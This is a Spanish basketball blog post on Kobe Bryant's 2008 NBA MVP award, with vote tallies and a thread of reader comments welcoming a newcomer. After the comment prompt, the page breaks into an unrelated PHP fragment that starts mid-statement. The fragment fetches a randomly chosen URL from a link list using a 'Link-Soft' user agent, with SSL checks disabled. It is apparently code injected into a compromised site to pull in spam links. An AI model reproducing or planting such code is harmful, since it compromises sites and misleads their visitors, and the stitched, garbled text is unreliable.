Los premios de la 2007-2008: Most Valuable Player

08 de May de 2008 por TheDeerHunter

Pocos premios se recuerdan tan ansiados como el que anoche se le entregó a Kobe Bryant. Han tenido que pasar muchos años, tantos que se dice que, empatado con Karl Malone, representan la más larga espera que ha tenido que aguantar uno de los grandes antes de lograr el premio. Nada más y nada menos que 12 años de espera. Y es que si el 24 de los Lakers, antes el 8, lleva varios temporadas demostrando que es el mejor jugador del mundo, ha tenido que llegar este momento para que se le pueda considerar un grande a todos los efectos. Y es que, si el premio es controvertido de per sé, por el difuso concepto que lo motiva, ni la díscola figura del escolta ni la espectacular competencia han logrado, en esta ocasión, apartarle de una elección por aplastante mayoría. Hasta el legendario Larry Bird ha llegado a decir que si no se lo daban este año se plantearía renunciar a uno de los suyos.

Ya ha llovido desde que aquel chiquillo de “high school” que había fichado por L.A. nos alucinara con aquellos mates de vídeos que circulan por internet. Ya no es aquel chaval que ganaba títulos bajo la inmensa sombra de Shaquille y que se enfadaba si no le pasaban mucho el balón. Tampoco es la “estrella” que quiso un equipo para su lustre personal y la acumulación de números individuales. Es evidente que una trayectoria desde un punto tan joven y tan inmaduro finalmente le ha pasado factura y ha provocado que su carisma esté muy lejos de su nivel baloncestístico, algo con lo que, probablemente, tendrá que convivir el resto de su carrera.

Sin embargo, al final su indiscutible ética de trabajo, su talento natural, su ambición bien entendida ha logrado alcanzar al hombre, dejando atrás al niño. Kobe por fin ha entendido cual es la esencia del baloncesto, el colectivo, y se ha vaciado en él durante esta temporada. En defensa, en ataque, en el vestuario, en la implicación de sus compañeros, en la adaptación de Gasol… Kobe se ha encargado de todo y por fin SU EQUIPO puede aspirar a la gloria.

Ahora ya es leyenda.

Se sabía que el MVP saldría del cuarteto que formaban Lebron James, Kevin Garnett, Chris Paul y Kobe Bryant y que eran los 2 últimos los máximos favoritos. Finalmente se han cumpliado todas las expectativas y Kobe ha aconseguido el galardón con 206 puntos sobre Chris Paul, 430 sobre Kevin Garnett y 662 sobre King James. Detrás aparecen nombres como Dwight Howard, Amare Stoudamire, Tim Duncan, Tracy McGrady, Steve Nash, etc…

El comité de sabios de TJNBA no estuvo muy desencaminado porque nombre como MVP oficial a:

  1. Kobe Bryant 78
  2. Chris Paul 67
  3. Lebron James 13
  4. Kevin Garnett 11
  5. Tim Duncan 1
  6. Dwight Howard 1
Comenta

9 comentarios a esta entrada

  1. Red dice:
    #1

    Me encantan vuestros artículos y vuestra web… no comentaba puesto que no estaba registrado, pero problema resuelto… 😉

      Citar

  2. TheDeerHunter dice:
    #2

    eres bienvenido

      Citar

  3. Gallis dice:
    #3

    Bienvenido RED!!! cualquier comentarios, critica o sugerencia será bienvenida…

    Sobre el tema en cuestión, estaba claro. La pena es que no debería ser el primero, pero vaya…por cierto, Bryant es el único jugador del mejor quinteto de la liga que ha sido elegido por unanimidad (aunque Paul se ha quedado a solo 3 votos, jeje).

    Ah!, en la rueda de prensa le preguntaron si quería volver a ganarlo el año que viene y dijo que, más allá de esta temporada, lo único en lo que pensaba es en impedir que Pau gane el oro en Beijing…uffff, que duros van a ser los States son este tipo…

      Citar

  4. Dantley dice:
    #4

    Pues totalmente merecido. No digo que Paul no haya estado a esa altura, pero era demasiado injusto que no tuviera ya uno. Y uno no es sospechoso de ser amarillo.

    Bienvenido Red, ¿de los Bulls, quizá?

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    te pinta de ser valencià el Red este. Benvingut.

    Normal que le den el MVP,, si juega al lado de Ira Newble.

      Citar

  6. Viva_Dirk dice:
    #6

    Bienvenido Red!!!

      Citar

  7. Red dice:
    #7

    Catalán, y Gasol Fan… Veo que Ira Newble es todo un ídolo aqui, jejeje…

      Citar

  8. Red dice:
    #8

    Ah, y gracias por la calurosa bienvenida
    Jejeje otra vez

      Citar

  9. xapa_croack dice:
    #9

    Grande ese red perill, otro gasofa por la vida, esperamos tus comentarios ansiadamente.

    Ira Newble y Venga quien venga son idolatrados mundialmente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>